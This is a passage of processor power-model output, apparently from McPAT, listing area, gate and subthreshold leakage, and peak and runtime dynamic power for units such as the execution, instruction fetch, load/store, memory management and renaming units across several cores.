'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0460934,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.93194,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.173486,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.156554,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.29275,
'Instruction Fetch Unit/Runtime Dynamic': 0.402376,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0356709,
'L2/Runtime Dynamic': 0.0080202,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.63095,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.680792,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0450938,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0450937,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.84389,
'Load Store Unit/Runtime Dynamic': 0.948273,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.111194,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.222387,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0394629,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0398514,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.182297,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0288764,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.406196,
'Memory Management Unit/Runtime Dynamic': 0.0687278,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.3368,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 4.96768e-06,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00697374,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0784063,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.085385,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.95872,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0497804,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.241788,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.266638,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.115969,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.187054,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0944185,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.397441,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0917557,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.47338,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0503736,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00486426,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0539008,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0359742,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.104274,
'Execution Unit/Register Files/Runtime Dynamic': 0.0408385,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.126002,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.313117,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.39856,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000352288,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000352288,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000323299,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000134155,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000516772,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00154465,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00278975,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0345829,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.19977,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.080069,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.117459,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.52505,
'Instruction Fetch Unit/Runtime Dynamic': 0.236446,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0463941,
'L2/Runtime Dynamic': 0.00401459,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.59537,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.657263,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0439427,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0439426,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.80288,
'Load Store Unit/Runtime Dynamic': 0.917916,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.108355,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.21671,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0384556,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0391504,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.136774,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0131318,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.358943,
'Memory Management Unit/Runtime Dynamic': 0.0522822,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.7961,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.13251,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00684483,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0569405,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.196296,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.80552,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0981967,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.279817,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.622045,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.18956,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.305753,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.154334,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.649647,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.121434,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.10391,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.117518,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.007951,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0905286,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0588025,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.208046,
'Execution Unit/Register Files/Runtime Dynamic': 0.0667535,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.215273,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.562655,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.96425,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 2.12932e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 2.12932e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 1.857e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 7.20164e-06,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000844703,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000905859,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000203314,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
